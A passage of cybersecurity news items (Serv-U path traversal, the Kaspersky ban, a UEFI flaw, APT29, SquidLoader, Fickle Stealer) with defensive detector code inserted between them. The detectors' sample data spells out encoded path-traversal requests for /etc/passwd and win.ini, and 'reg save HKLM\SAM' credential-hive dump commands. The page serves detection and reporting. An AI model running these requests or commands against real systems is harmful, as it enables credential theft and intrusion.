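	for _, ln := range lines {
		m := logRe.FindStringSubmatch(ln)
		if m == nil {
			continue
		}
		if IsTraversal(m[3]) {
			hits = append(hits, Hit{Client: m[1], Target: m[3], Decoded: Normalise(m[3])})
		}
	}
	return hits
}

// SampleLog is constructed input: one backslash-encoded attempt in a query
// string, one benign request, one double-encoded attempt, one forward-slash
// attempt at a Windows file.
var SampleLog = []string{
	`203.0.113.5 - - [20/Jun/2024:10:01:02 +0000] "GET /?d=..%5C..%5C..%5C..%5Cetc&f=passwd HTTP/1.1" 200 1043`,
	`198.51.100.7 - - [20/Jun/2024:10:02:15 +0000] "GET /login?user=bob HTTP/1.1" 200 512`,
	`203.0.113.9 - - [20/Jun/2024:10:03:40 +0000] "GET /%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0`,
	`203.0.113.5 - - [20/Jun/2024:10:04:01 +0000] "GET /docs/..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 403`,
}

func main() {
	for _, h := range ScanLog(SampleLog) {
		fmt.Printf("%s  %s  ->  %s\n", h.Client, h.Target, h.Decoded)
	}
}
```

A 200 status on a flagged line is the one to chase first, since it suggests the server returned something; the 404 still identifies a scanner worth blocking.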

With previous flaws in Serv-U software exploited by threat actors, it's imperative that users apply the updates as soon as possible to mitigate potential threats.

"The fact that attackers are using publicly available PoCs means the barrier to entry for malicious actors is incredibly low," Naomi Buckwalter, director of product security at Contrast Security, said in a statement shared with The Hacker News.

"Successful exploitation of this vulnerability could be a stepping stone for attackers. By gaining access to sensitive information like credentials and system files, attackers can use that information to launch further attacks, a technique called 'chaining.' This can lead to a more widespread compromise, potentially impacting other systems and applications."


U.S. Bans Kaspersky Software, Citing National Security Risks
23.6.24 
BigBrothers  The Hacker News
The U.S. Department of Commerce's Bureau of Industry and Security (BIS) on Thursday announced a "first of its kind" ban that prohibits Kaspersky Lab's U.S. subsidiary from directly or indirectly offering its security software in the country.

The blockade also extends to the cybersecurity company's affiliates, subsidiaries and parent companies, the department said, adding the action is based on the fact that its operations in the U.S. posed a national security risk. News of the ban was first reported by Reuters.

"The company's continued operations in the United States presented a national security risk — due to the Russian Government's offensive cyber capabilities and capacity to influence or direct Kaspersky's operations — that could not be addressed through mitigation measures short of a total prohibition," the BIS said.

It further said Kaspersky is subject to the jurisdiction and control of the Russian government and that its software provides Kremlin access to sensitive U.S. customer information as well as allows for installing malicious software or withholding critical updates.

"The manipulation of Kaspersky software, including in U.S. critical infrastructure, can cause significant risks of data theft, espionage, and system malfunction," it noted. "It can also risk the country's economic security and public health, resulting in injuries or loss of life."

As part of the ban, Kaspersky will be barred from selling its software to American consumers and businesses starting on July 20. However, the company can still provide software and antivirus signature updates to existing customers until September 29.

It's also urging current individual and business customers to find suitable replacements within the 100-day time period so as to ensure that there are no gaps in security protections. That said, it's worth noting that they can continue to use the products should they choose to do so.

"Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponize sensitive U.S. information, and we will continue to use every tool at our disposal to safeguard U.S. national security and the American people," Secretary of Commerce Gina Raimondo said.

That's not all. Kaspersky has also been added to the Entity List for its "cooperation with Russian military and intelligence authorities in support of the Russian Government's cyber intelligence objectives."

The Moscow-headquartered firm, which serves over 400 million customers and 240,000 corporate clients across 200 countries including Piaggio, Volkswagen Group Retail Spain, and the Qatar Olympic Committee, has long been in the crosshairs of the U.S. government over its ties to Russia.

In September 2017, the U.S. government banned its products from federal networks, citing national security concerns. Weeks after that announcement, a Wall Street Journal report alleged Russian government hackers had stolen U.S. classified hacking tools stored on a National Security Agency (NSA) contractor's home computer because it was running Kaspersky software.

The New York Times reported days later that Israeli officials notified the U.S. of the espionage operation after they hacked into Kaspersky's network in 2015. The company responded saying it came across the code in 2014 when its antivirus software flagged a 7-Zip file as malicious on a U.S.-based computer.

The tool, later attributed to the Equation Group, was deleted and no third parties saw the code, the company said at the time following an internal investigation. Equation Group is the name assigned by Kaspersky to a hacking crew with suspected ties to the NSA's Tailored Access Operations (TAO) cyberwarfare unit.

Nearly five years later, Kaspersky was added to the Federal Communications Commission's (FCC) "Covered List" of companies that pose an "unacceptable risk to the national security" of the country. Germany and Canada have enacted similar restrictions in recent years.

Responding to the latest move from the U.S. government, Kaspersky said the Commerce Department made its decision based on the current geopolitical climate and theoretical concerns, adding it "unfairly ignores" evidence of the transparency measures implemented by the company to demonstrate integrity and trustworthiness.

"The primary impact of these measures will be the benefit they provide to cybercrime," it said. "International cooperation between experts is crucial in the fight against malware, and yet this will restrict those efforts."


Researchers Uncover UEFI Vulnerability Affecting Multiple Intel CPUs
20.6.24 
Vulnerability  The Hacker News
Researchers have disclosed details of a now-patched security flaw in Phoenix SecureCore UEFI firmware that affects multiple families of Intel Core desktop and mobile processors.

Tracked as CVE-2024-0762 (CVSS score: 7.5), the "UEFIcanhazbufferoverflow" vulnerability has been described as a case of a buffer overflow stemming from the use of an unsafe variable in the Trusted Platform Module (TPM) configuration that could result in the execution of malicious code.

"The vulnerability allows a local attacker to escalate privileges and gain code execution within the UEFI firmware during runtime," supply chain security firm Eclypsium said in a report shared with The Hacker News.

"This type of low-level exploitation is typical of firmware backdoors (e.g., BlackLotus) that are increasingly observed in the wild. Such implants give attackers ongoing persistence within a device and often, the ability to evade higher-level security measures running in the operating system and software layers."

Following responsible disclosure, the vulnerability was addressed by Phoenix Technologies in April 2024. PC maker Lenovo has also released updates for the flaw as of last month.

"This vulnerability affects devices using Phoenix SecureCore firmware running on select Intel processor families, including AlderLake, CoffeeLake, CometLake, IceLake, JasperLake, KabyLake, MeteorLake, RaptorLake, RocketLake, and TigerLake," the firmware developer said.

UEFI, a successor to BIOS, refers to motherboard firmware used during startup to initialize the hardware components and load the operating system via the boot manager.

The fact that UEFI is the first code that's run with the highest privileges has made it a lucrative target for threat actors looking to deploy bootkits and firmware implants that can subvert security mechanisms and maintain persistence without being detected.

This also means that vulnerabilities discovered in the UEFI firmware can pose a severe supply chain risk, as they can impact many different products and vendors at once.

"UEFI firmware is some of the most high-value code on modern devices, and any compromise of that code can give attackers full control and persistence on the device," Eclypsium said.

The development comes nearly a month after the company disclosed a similar unpatched buffer overflow flaw in HP's implementation of UEFI that impacts HP ProBook 11 EE G1, a device that reached end-of-life (EoL) status as of September 2020.

It also follows the disclosure of a software attack called TPM GPIO Reset that could be exploited by attackers to access secrets stored on disk by other operating systems or undermine controls that are protected by the TPM such as disk encryption or boot protections.


French Diplomatic Entities Targeted in Russian-Linked Cyber Attacks
20.6.24 
BigBrothers  The Hacker News
State-sponsored actors with ties to Russia have been linked to targeted cyber attacks aimed at French diplomatic entities, the country's information security agency ANSSI said in an advisory.

The attacks have been attributed to a cluster tracked by Microsoft under the name Midnight Blizzard (formerly Nobelium), which overlaps with activity tracked as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, and The Dukes.

While the monikers APT29 and Midnight Blizzard have been interchangeably used to refer to intrusion sets associated with the Russian Foreign Intelligence Service (SVR), ANSSI said it prefers to treat them as disparate threat clusters alongside a third one dubbed Dark Halo, which has been held responsible for the 2020 supply chain attack via SolarWinds software.

"Nobelium is characterized by the use of specific codes, tactics, techniques, and procedures. Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies, and consulates," the agency said.

It's worth noting that the targeting of diplomatic entities is also monitored under the name Diplomatic Orbiter.

The attacks entail sending phishing emails to French public organizations from foreign institutions and individuals previously compromised by the threat actor to initiate a series of malicious actions.

"In May 2023, several European embassies in Kyiv were targeted by a phishing campaign conducted by Nobelium's operators," it said. "The French embassy in Kyiv was one of the targets of this campaign, which was conducted through an email that was themed about a 'Diplomatic car for sale.'"

Another attack observed in the same month targeting the French Embassy in Romania was ultimately unsuccessful, ANSSI noted.

Other intrusions mounted by the threat actor have leveraged security flaws in JetBrains TeamCity servers as part of an opportunistic campaign. In recent months, it has also been linked to breaches of Microsoft and Hewlett Packard Enterprise (HPE).

"The targeting of IT and cybersecurity entities for espionage purposes by Nobelium operators potentially strengthens their offensive capabilities and the threat they represent," the agency said. "The intelligence gathered during recent attacks against IT sector entities could also facilitate Nobelium's future operations."

The disclosure comes as Poland revealed that Russian hackers could be behind the DDoS attack on Telewizja Polska (TVP) that led to the disruption of an online broadcast of the Euro 2024 soccer tournament on June 16, 2024.


Chinese Cyber Espionage Targets Telecom Operators in Asia Since 2021
20.6.24 
BigBrothers  The Hacker News
Cyber espionage groups associated with China have been linked to a long-running campaign that has infiltrated several telecom operators located in a single Asian country at least since 2021.

"The attackers placed backdoors on the networks of targeted companies and also attempted to steal credentials," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.

The firm did not reveal the country that was targeted, but said it found evidence to suggest that the malicious cyber activity may have started as far back as 2020.

The attacks also targeted an unnamed services company that catered to the telecoms sector and a university in another Asian country, it added.

The choice of tools used in this campaign overlaps with other missions conducted by Chinese espionage groups like Mustang Panda (aka Earth Preta and Fireant), RedFoxtrot (aka Neeedleminer and Nomad Panda), and Naikon (aka Firefly) in recent years.

This includes custom backdoors tracked as COOLCLIENT, QuickHeal, and RainyDay that come equipped with capabilities to capture sensitive data and establish communication with a command-and-control (C2) server.

While the exact initial access pathway used to breach the targets is presently unknown, the campaign is also notable for deploying port scanning tools and conducting credential theft through the dumping of Windows Registry hives.
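The credential theft via Registry hive dumping mentioned above is one of the few concrete techniques the report names, and it leaves a clean trail in process-creation logs. The following is an added defender-side example written for this page, not code from Symantec's report: it flags command lines that save or export the SAM, SECURITY or SYSTEM hives; the hostnames, users and events are constructed.

```python
import re

# Detector for credential theft via Registry hive dumping (the technique noted
# in the telecom campaign above). Example code written for this page, not from
# Symantec's report. Input: process-creation events (host, user, command line).

# "reg"/"reg.exe" (optionally quoted or with a path) followed by save or export
REG_SAVE_RE = re.compile(r'(?i)(?:^|[\\\s"])reg(?:\.exe)?"?\s+(?:save|export)\b')
# the three hives that together yield local account hashes and cached secrets
CRED_HIVE_RE = re.compile(r"(?i)\b(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SECURITY|SYSTEM)\b")

# constructed sample events: (host, user, command_line)
SAMPLE_EVENTS = [
    ("TELCO-DC01", "svc_backup", r"C:\Windows\system32\reg.exe save HKLM\SAM C:\Windows\Temp\sam.hiv"),
    ("TELCO-WS22", "jdoe", r'"reg" SAVE hklm\security c:\perflogs\sec.dat'),
    ("TELCO-WS22", "jdoe", r"reg.exe export HKEY_LOCAL_MACHINE\SYSTEM %TEMP%\sys.reg"),
    ("TELCO-WS09", "admin", r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    ("TELCO-WS09", "admin", r"reg save HKCU\Software\Vendor\App backup.hiv"),
    ("TELCO-DC01", "svc_backup", r"cmd.exe /c reg save HKLM\SAM s.hiv && reg save HKLM\SYSTEM y.hiv"),
]


def detect_hive_dump(command_line):
    """Return the credential hives a command line saves or exports (empty if none)."""
    if not REG_SAVE_RE.search(command_line):
        return set()
    return {m.group(1).upper() for m in CRED_HIVE_RE.finditer(command_line)}


def triage(events):
    """Return one alert per offending event: (host, user, sorted hive names)."""
    alerts = []
    for host, user, command_line in events:
        hives = detect_hive_dump(command_line)
        if hives:
            alerts.append((host, user, sorted(hives)))
    return alerts


if __name__ == "__main__":
    for host, user, hives in triage(SAMPLE_EVENTS):
        print(f"{host}: {user} dumped {', '.join(hives)}")
```

A save of a user hive (HKCU) or a plain `reg query` is deliberately not alerted, so the rule stays quiet on routine administration while still catching chained dumps in a single `cmd /c` line.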

The fact that the tooling has connections to three different adversarial collectives has raised several possibilities: The attacks are being conducted independently of each other, a single threat actor is using tools acquired from other groups, or diverse actors are collaborating on a single campaign.

Also unclear at this stage is the primary motive behind the intrusions, although Chinese threat actors have a history of targeting the telecoms sector across the world.

In November 2023, Kaspersky revealed a ShadowPad malware campaign targeting one of the national telecom companies of Pakistan by exploiting known security flaws in Microsoft Exchange Server (CVE-2021-26855 aka ProxyLogon).

"The attackers may have been gathering intelligence on the telecoms sector in that country," Symantec postulated. "Eavesdropping is another possibility. Alternatively, the attackers may have been attempting to build a disruptive capability against critical infrastructure in that country."


Experts Uncover New Evasive SquidLoader Malware Targeting Chinese Organizations
20.6.24 
Virus  The Hacker News
Researchers have uncovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations.

AT&T LevelBlue Labs, which first observed the malware in late April 2024, said it incorporates features that are designed to thwart static and dynamic analysis and ultimately evade detection.

Attack chains leverage phishing emails that come with attachments that masquerade as Microsoft Word documents, but, in reality, are binaries that pave the way for the execution of the malware, which is then used to fetch second-stage shellcode payloads from a remote server, including Cobalt Strike.

"These loaders feature heavy evasion and decoy mechanisms which help them remain undetected while also hindering analysis," security researcher Fernando Dominguez said. "The shellcode that is delivered is also loaded in the same loader process, likely to avoid writing the payload to disk and thus risk being detected."


Some of the defensive evasion techniques adopted by SquidLoader encompass the use of encrypted code segments, pointless code that remains unused, Control Flow Graph (CFG) obfuscation, debugger detection, and performing direct syscalls instead of calling Windows NT APIs.

Loader malware has become a popular commodity in the criminal underground for threat actors looking to deliver and launch additional payloads to compromised hosts, while bypassing antivirus defenses and other security measures.

Last year, Aon's Stroz Friedberg incident response team detailed a loader known as Taurus Loader that has been observed distributing the Taurus information stealer as well as AgentVX, a trojan with capabilities to execute more malware, set up persistence using Windows Registry changes, and gather data.

The development comes as a new in-depth analysis of a malware loader and backdoor referred to as PikaBot has highlighted that it has been under continuous active development since its emergence in February 2023.


"The malware employs advanced anti-analysis techniques to evade detection and harden analysis, including system checks, indirect syscalls, encryption of next-stage and strings, and dynamic API resolution," Sekoia said. "The recent updates to the malware have further enhanced its capabilities, making it even more challenging to detect and mitigate."

It also follows findings from BitSight that the infrastructure related to another loader malware called Latrodectus has gone offline in the wake of a law enforcement effort dubbed Operation Endgame that saw over 100 botnet servers, including those associated with IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot, dismantled.

The company said it observed nearly 5,000 distinct victims spread across 10 different campaigns, with a majority of the victims located in the U.S., the U.K., the Netherlands, Poland, France, Czechia, Japan, Australia, Germany, and Canada.


New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration
20.6.24 
Virus  The Hacker News
A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts.

Fortinet FortiGuard Labs said it's aware of four different distribution methods -- namely VBA dropper, VBA downloader, link downloader, and executable downloader -- with some of them using a PowerShell script to bypass User Account Control (UAC) and execute Fickle Stealer.

The PowerShell script ("bypass.ps1" or "u.ps1") is also designed to periodically send information about the victim, including country, city, IP address, operating system version, computer name, and username to a Telegram bot controlled by the attacker.

The stealer payload, which is protected using a packer, runs a series of anti-analysis checks to determine if it's running in a sandbox or a virtual machine environment, following which it beacons out to a remote server to exfiltrate data in the form of JSON strings.
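The periodic Telegram beacon described above can be spotted at the web proxy without touching the endpoint, because the Bot API puts the bot token in the URL path. The following is an added example written for this page, not Fortinet's code: it groups Telegram Bot API calls made by PowerShell hosts by bot token, masks the token's secret half and flags near-constant intervals; the client names, tokens and timestamps are constructed placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Proxy-log detector for the Fickle Stealer behaviour above: a PowerShell host
# posting to a Telegram bot on a schedule. Example code written for this page, not
# Fortinet's; clients, tokens and timestamps below are constructed placeholders.
BOT_PATH_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]+)/(sendMessage|sendDocument)$")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

SAMPLE_LOG = """\
2024-06-01T10:00:00|WS-07|powershell.exe|https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN_A/sendMessage|200
2024-06-01T10:00:05|WS-07|chrome.exe|https://web.telegram.org/a/|200
2024-06-01T10:05:00|WS-07|powershell.exe|https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN_A/sendMessage|200
2024-06-01T10:06:12|WS-12|powershell.exe|https://www.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt|200
2024-06-01T10:07:00|WS-12|pwsh.exe|https://api.telegram.org/bot555:PLACEHOLDER_TOKEN_B/sendDocument|200
2024-06-01T10:10:00|WS-07|powershell.exe|https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN_A/sendMessage|200
2024-06-01T10:11:30|WS-03|ops-agent.exe|https://api.telegram.org/bot99:PLACEHOLDER_TOKEN_C/sendMessage|200
"""  # constructed: timestamp|client|process|url|status

def parse_log(text):
    """Yield (timestamp, client, process, url) from the pipe-separated log."""
    for line in text.splitlines():
        ts, client, process, url, _status = line.split("|")
        yield datetime.fromisoformat(ts), client, process.lower(), url

def bot_calls_by_script_host(events):
    """Group Bot API calls made by PowerShell hosts under (client, bot token)."""
    groups = defaultdict(list)
    for ts, client, process, url in events:
        parts = urlsplit(url)
        match = BOT_PATH_RE.match(parts.path)
        if process in SCRIPT_HOSTS and parts.hostname == "api.telegram.org" and match:
            groups[(client, match.group(1))].append(ts)
    return groups

def redact(token):
    """Keep the numeric bot id for pivoting, mask the secret half of the token."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{'*' * len(secret)}"

def alerts(events, min_beacons=3, max_jitter=0.2):
    """One alert per (client, bot); 'periodic' marks near-constant intervals."""
    out = []
    for (client, token), times in bot_calls_by_script_host(events).items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        periodic = (len(times) >= min_beacons and len(gaps) >= 2
                    and pstdev(gaps) <= max_jitter * mean(gaps))
        out.append({"client": client, "bot": redact(token),
                    "count": len(times), "periodic": periodic})
    return out
```

Legitimate automation that uses the Bot API from a non-script process (the `ops-agent.exe` line) is left alone; a single PowerShell upload is still reported, only without the `periodic` flag.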

Fickle Stealer is no different from other variants in that it's designed to gather information from crypto wallets, web browsers powered by Chromium and the Gecko browser engine (i.e., Google Chrome, Microsoft Edge, Brave, Vivaldi, and Mozilla Firefox), and applications like AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram.

It's also designed to export files matching the extensions .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .odp, and wallet.dat.

"In addition to some popular applications, this stealer searches sensitive files in parent directories of common installation directories to ensure comprehensive data gathering," security researcher Pei Han Liao said. "It also receives a target list from the server, which makes Fickle Stealer more flexible."

The disclosure comes as Symantec disclosed details of an open-source Python stealer called AZStealer that comes with the functionality to steal a wide variety of information. Available on GitHub, it has been advertised as the "best undetected Discord stealer."

"All stolen information is zipped and depending on the size of the archive exfiltrated directly through Discord webhooks or first uploaded to Gofile online files storage and after that exfiltrated via Discord," the Broadcom-owned company said.

"AZStealer will also attempt the theft of document files with predefined targeted extensions or those having specific keywords such as password, wallet, backup, etc. in the filename."